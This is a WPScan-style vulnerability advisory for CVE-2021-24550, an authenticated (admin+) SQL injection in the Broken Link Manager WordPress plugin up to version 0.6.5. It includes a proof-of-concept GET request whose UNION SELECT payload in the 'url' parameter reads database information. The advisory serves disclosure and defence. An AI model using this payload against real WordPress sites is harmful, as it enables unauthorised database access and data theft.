Lucene search
WpvulndbWPVDB-ID:1BF65448-689C-474D-A566-C9B6797D3E4AHistoryJul 24, 2021 - 12:00 a.m.
Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection
2021-07-2400:00:00
wpscan.com
10
broken link manager
sql injection
unsanitised parameter
authenticated
admin
EPSS
0.001
Percentile
45.0%
The plugin does not sanitise, validate or escape the url GET parameter before using it in a SQL statement when retrieving an URL to edit, leading to an authenticated SQL injection issue
PoC
GET /wp-admin/admin.php?page=wblm-edit-url&url;=-4966%20UNION%20ALL%20SELECT%20NULL,current_user(),current_user(),NULL,NULL,NULL,NULL-- HTTP/1.1 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 Cookie: [admin+] Connection: close
Related
nvd
nvd
CVE-2021-24550
2021-08-23 12:15:09
cvelist
cvelist
wpexploit
wpexploit
Broken Link Manager <= 0.6.5 - Authenticated (admin+) SQL Injection
2021-07-24 00:00:00
cve
cve
CVE-2021-24550
2021-08-23 12:15:09
prion
prion
Sql injection
2021-08-23 12:15:00
patchstack
patchstack